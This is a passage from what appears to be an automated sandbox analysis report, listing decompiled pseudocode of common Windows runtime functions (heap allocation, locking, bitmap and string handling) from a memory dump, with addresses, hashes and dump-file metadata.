						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E034A6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E034A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03447D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03469AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0346B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03444620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x034a7016
0x034a701e
0x034a702b
0x034a7033
0x034a7037
0x034a703c
0x034a703e
0x034a7041
0x034a7045
0x034a704a
0x034a7050
0x034a7055
0x034a705a
0x034a7062
0x034a7062
0x034a705a
0x034a7064
0x034a7064
0x034a7067
0x034a7071
0x034a7096
0x034a709b
0x034a70a2
0x034a70a6
0x034a70a7
0x034a70ad
0x034a70b3
0x034a70b6
0x034a70bb
0x034a70c3
0x034a70c3
0x034a70c6
0x034a70cd
0x034a70dd
0x034a70e0
0x034a70e2
0x034a70e2
0x034a70ee
0x034a7101
0x034a70f0
0x034a70f9
0x034a70f9
0x034a710a
0x034a710e
0x034a7112
0x034a7117
0x034a7118
0x034a7118
0x034a70bb
0x034a711d
0x034a7123
0x034a7131
0x034a7131
0x034a7136
0x034a713d
0x034a713e
0x034a713f
0x034a714a
0x034a714a
0x034a7084
0x034a7088
0x00000000
0x034a708e
0x034a708e
0x034a7092
0x00000000
0x034a7092

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c75287cbd132abb0ed0c67bdbba281d8624d95711ea64b40d451bbc52b146d
Instruction ID: 131ac787a5b7f7720ed13144555073e33cf203fb827ffcddd4eed3025242b8d9
Opcode Fuzzy Hash: 71c75287cbd132abb0ed0c67bdbba281d8624d95711ea64b40d451bbc52b146d
Instruction Fuzzy Hash: 8831C576604B519FC320DF69C840A6BB7E5BF98600F084A2EF8958F790E730E904C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0345A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0345A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3517b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3517b10 = 8;
					 *0x3517b14 = 0x3517b0c;
					 *0x3517b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0345A990(0x3517b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0345A840(__edx, __ecx, __ecx, _t52, 0x3517b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3517b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x3517b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x3517b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L03444620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3517b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0346F3E0(_t50,  *0x3517b14, _t8 >> 3);
						_t28 =  *0x3517b14; // 0x0
						__eflags = _t28 - 0x3517b0c;
						if(_t28 != 0x3517b0c) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x3517b14 = _t50;
						_t48 = _v12;
						 *0x3517b10 = _t9;
						goto L6;
					}
					 *0x3517b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0345a713
0x0345a714
0x0345a717
0x0345a71d
0x0345a720
0x0345a722
0x0345a727
0x0345a74a
0x0345a754
0x0345a75e
0x0345a768
0x0345a76a
0x0345a773
0x0345a78b
0x0345a790
0x0345a792
0x0345a741
0x0345a741
0x0345a743
0x0345a749
0x0345a749
0x0345a732
0x0345a73a
0x0345a797
0x0345a79d
0x0345a7a3
0x0345a7a9
0x0345a7b6
0x0345a7bc
0x0345a7ca
0x0345a7e0
0x0345a7e2
0x0345a7e4
0x03499bf2
0x00000000
0x03499bf2
0x0345a7ed
0x0345a7f2
0x0345a800
0x0345a805
0x0345a80d
0x0345a812
0x03499c08
0x03499c08
0x0345a818
0x0345a81b
0x0345a821
0x0345a824
0x00000000
0x0345a824
0x0345a7ae
0x00000000
0x0345a7ae
0x0345a73c
0x0345a73e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5dc80c0cb4ad86b75d67f84a7304b634529190ddee0ce9c23e7de51e9e15f12
Instruction ID: e5e3a23fbf18ad3599494f6af8f7fbfd8091194e47230a498f0420f948fd1efd
Opcode Fuzzy Hash: a5dc80c0cb4ad86b75d67f84a7304b634529190ddee0ce9c23e7de51e9e15f12
Instruction Fuzzy Hash: 5631AEB1B002049FD712EF1CE880F2BBBF9FB88710F140A5AE4158B365E774A906DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0342AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0342AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x351d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3517b9c; // 0x0
					_t53 = L03444620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0346B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0346F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03436C59(_t53, _t51, _t58) != 0) {
							_t28 = E03455E50(0x340c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0345B230(_v32, _v28, 0x340c2d8, 1,  &_v24);
								_t28 = E0342F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0342aa25
0x0342aa29
0x0342aa2d
0x0342aa30
0x0342aa37
0x0342aa3c
0x03484458
0x03484458
0x03484472
0x03484474
0x03484476
0x0342aa64
0x0342aa74
0x0348447c
0x03484483
0x03484492
0x0342aa52
0x0342aa54
0x0342aa5e
0x034844a8
0x034844ad
0x034844af
0x034844b6
0x034844b6
0x034844b9
0x034844bc
0x034844cd
0x034844d3
0x034844d6
0x034844e1
0x034844e1
0x034844e6
0x034844e8
0x034844fb
0x034844fb
0x034844e8
0x00000000
0x0342aa5e
0x03484476
0x0342aa42
0x0342aa46
0x0342aa48
0x0342aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded23a53567fa2c954801f3877cb99a08b5c4178e1d35dcfc142ece9577f9e39
Instruction ID: 064be4c51f2fadb3e03834197dcf07c1b81f7142bf22f38f87553ea8978f6a9a
Opcode Fuzzy Hash: ded23a53567fa2c954801f3877cb99a08b5c4178e1d35dcfc142ece9577f9e39
Instruction Fuzzy Hash: 3631C471A00229AFCF11EF65C981A7FB7B9EF04B00B45406BF911EF250EB349911D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 034561A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E034561A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03455E50(0x34067cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E034F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0342F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x034561b3
0x034561b5
0x034561bd
0x034561c3
0x034561c7
0x034561d2
0x034561ff
0x034561ff
0x03456201
0x03456207
0x03456207
0x034561d4
0x034561d9
0x00000000
0x00000000
0x034561df
0x034561e2
0x00000000
0x00000000
0x034561e6
0x034561e8
0x034561ee
0x034561ee
0x034561f9
0x0349762f
0x03497632
0x03497635
0x03497639
0x03497640
0x0349766e
0x03497675
0x00000000
0x00000000
0x03497681
0x03497689
0x0349768d
0x03497691
0x03497695
0x03497699
0x034976af
0x034976b5
0x034976b7
0x034976b7
0x034976d7
0x034976dc
0x00000000
0x034976dc
0x034976a2
0x034976a9
0x03497651
0x03497653
0x03497653
0x03497656
0x03497656
0x00000000
0x03497656
0x03497644
0x03497646
0x03497648
0x03497648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7353ad0910b9ac93546ea6a7e8b9b48d110a169ff98e9304283513d64a8eabfd
Instruction ID: 953fba7044cd7701ddb5412573ba561d8f8693722e218ae8a37f9ac3a7075421
Opcode Fuzzy Hash: 7353ad0910b9ac93546ea6a7e8b9b48d110a169ff98e9304283513d64a8eabfd
Instruction Fuzzy Hash: CB314A71A157018FE720CF19C840B26FBE4EB88B10F49496FF9949B362D774E804CB99

Uniqueness

Uniqueness Score: -1.00%

Function 03464A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03464A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x351d360 ^ _t62;
				_v8 =  *0x351d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03442280(_t26, 0x3518608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0343FFB0(_t41, _t51, 0x3518608);
						L2:
						 *0x351b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0346B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03442280(_t28, 0x3518608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0343FFB0(_t42, _t53, 0x3518608);
							if(_t53 != 0) {
								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0343FFB0(_t41, _t51, 0x3518608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x03464a2c
0x03464a34
0x03464a3c
0x03464a3e
0x03464a48
0x03464a4b
0x03464a4d
0x03464a51
0x03464a9c
0x00000000
0x00000000
0x03464aa3
0x03464aa8
0x03464aad
0x03464ab1
0x03464ade
0x03464ae3
0x03464a5a
0x03464a62
0x03464a6a
0x03464a6e
0x0349f203
0x03464a84
0x03464a88
0x03464a89
0x03464a8a
0x03464a95
0x03464a95
0x03464a79
0x03464a80
0x03464af2
0x03464af4
0x03464af9
0x03464aff
0x03464b01
0x03464b03
0x03464b08
0x0349f20a
0x0349f212
0x0349f216
0x0349f216
0x03464b08
0x03464b13
0x03464b1a
0x0349f229
0x0349f229
0x03464b1a
0x03464a82
0x00000000
0x03464a82
0x03464ab7
0x03464acd
0x03464acd
0x03464ad5
0x03464ada
0x00000000
0x03464ada
0x03464ac2
0x03464acb
0x00000000
0x00000000
0x00000000
0x03464acb
0x03464a53
0x03464a53
0x03464a58
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c245958b7621e1772176f63f41757b0a95d6aec9dfee1ce121a8525debab92c
Instruction ID: a7e0bc600ab3ce8b705628360a5a749d648c64e7d440e4d039c9cab29218f0b8
Opcode Fuzzy Hash: 0c245958b7621e1772176f63f41757b0a95d6aec9dfee1ce121a8525debab92c
Instruction Fuzzy Hash: 6C31DE32215754AFDB21DF56C941B2BBBA8FB85A10F08456BE8664F350C7B0D805CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 03468EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03468EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x351d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03454E70(0x35186e4, 0x3469490, 0, 0);
					if( *0x35153e8 > 5 && E03468F33(0x35153e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x35153e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x35153e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x340bc46;
						_t48 = E034A7B9C(0x35153e8, 0x340bc46, _t67, 0x35153e8, _t70,  &_v140);
					}
				}
				return E0346B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x03468ec7
0x03468ed9
0x03468edc
0x03468ee6
0x03468ee9
0x03468eee
0x03468efc
0x03468f08
0x034a1349
0x034a1353
0x034a135d
0x034a1366
0x034a136f
0x034a1375
0x034a137c
0x034a1385
0x034a1390
0x034a1391
0x034a139c
0x034a139d
0x034a13a6
0x034a13ac
0x034a13b2
0x034a13b5
0x034a13bc
0x034a13bf
0x034a13c2
0x034a13c5
0x034a13c8
0x034a13cb
0x034a13ce
0x034a13d1
0x034a13d4
0x034a13d7
0x034a13da
0x034a13dd
0x034a13e0
0x034a13e3
0x034a13e6
0x034a13e9
0x034a13f6
0x034a1400
0x034a1400
0x03468f08
0x03468f32

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585cc5cdcec705e7a6772b47bf6f59a6a2b0ed07df3ec5980d1d87c39766aa79
Instruction ID: 1e29c5e1f9121ebdcf979383e6e5ff12457a1a4f6f46b5d24a9dff55ba7c45ae
Opcode Fuzzy Hash: 585cc5cdcec705e7a6772b47bf6f59a6a2b0ed07df3ec5980d1d87c39766aa79
Instruction Fuzzy Hash: 494191B1D003189EDB24CFAAD980AADFBF8FB48310F5041AFE519AB240E7705A84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0345E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0345E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03469670() < 0) {
					L0347DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3517b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03444620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0345E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0345e730
0x0345e736
0x0345e738
0x0345e73d
0x0345e73e
0x0345e740
0x0345e749
0x0345e765
0x0345e76a
0x0345e76b
0x0345e76c
0x0345e76d
0x0345e76e
0x0345e76f
0x0345e775
0x0345e777
0x0345e77e
0x0349b675
0x0345e784
0x0345e784
0x0345e789
0x0345e7a8
0x0345e7ac
0x0345e807
0x0345e7ae
0x0345e7ae
0x0345e7b1
0x0345e7b4
0x0345e7b9
0x0345e7c0
0x0345e7c4
0x0345e7ca
0x0345e7cc
0x00000000
0x0345e7d3
0x0345e7d6
0x00000000
0x00000000
0x0345e7ff
0x0345e802
0x00000000
0x00000000
0x0345e7f9
0x0345e7fc
0x00000000
0x00000000
0x0345e7f3
0x0345e7f6
0x00000000
0x00000000
0x0345e7ed
0x0345e7f0
0x00000000
0x00000000
0x0345e7e7
0x0345e7ea
0x00000000
0x00000000
0x0349b685
0x0349b688
0x00000000
0x00000000
0x0349b682
0x00000000
0x00000000
0x0345e7cc
0x0345e7d9
0x0345e7dc
0x0345e7de
0x0345e7de
0x0345e7ac
0x0345e7e4
0x0345e74b
0x0345e751
0x0345e759
0x0345e761
0x0345e761

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2f50758f70ff5cafb89ab35adaac1d9580e437af7b89201b902125c9e902e9
Instruction ID: 8b78b2380538c3be3e15978c093b2f94b8c9ef6ce4c4191fa1c0eae8bc17607a
Opcode Fuzzy Hash: 9d2f50758f70ff5cafb89ab35adaac1d9580e437af7b89201b902125c9e902e9
Instruction Fuzzy Hash: 06318C75A14249AFD704DF29D840B9ABBE4FB09210F14826AF914CF342D631E980CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0345BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0345BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3516100; // 0x7
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03442280(0xd, 0x1096f1a0);
				_t41 =  *0x35160f8; // 0x0
				if(_t41 != 0) {
					 *0x35160f8 =  *_t41;
					 *0x35160fc =  *0x35160fc + 0xffff;
				}
				E0343FFB0(_t41, 0x800, 0x1096f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x35160f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03444620(0x3516100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3516100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0345bc36
0x0345bc42
0x0345bc45
0x0345bc4a
0x0345bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0345bc50
0x0345bc50
0x0345bc58
0x0345bc5a
0x0345bc60
0x00000000
0x00000000
0x0349a4f2
0x0349a4f6
0x00000000
0x00000000
0x00000000
0x0349a4fc
0x0345bc79
0x0345bc7e
0x0345bc86
0x0345bd16
0x0345bd20
0x0345bd20
0x0345bc8d
0x0345bc94
0x0345bcbd
0x0345bcca
0x0345bccb
0x0345bccc
0x0345bccd
0x0345bcce
0x0345bcd4
0x0345bcea
0x0345bcee
0x0345bcf2
0x0345bd00
0x0345bd04
0x00000000
0x0345bc96
0x0345bcab
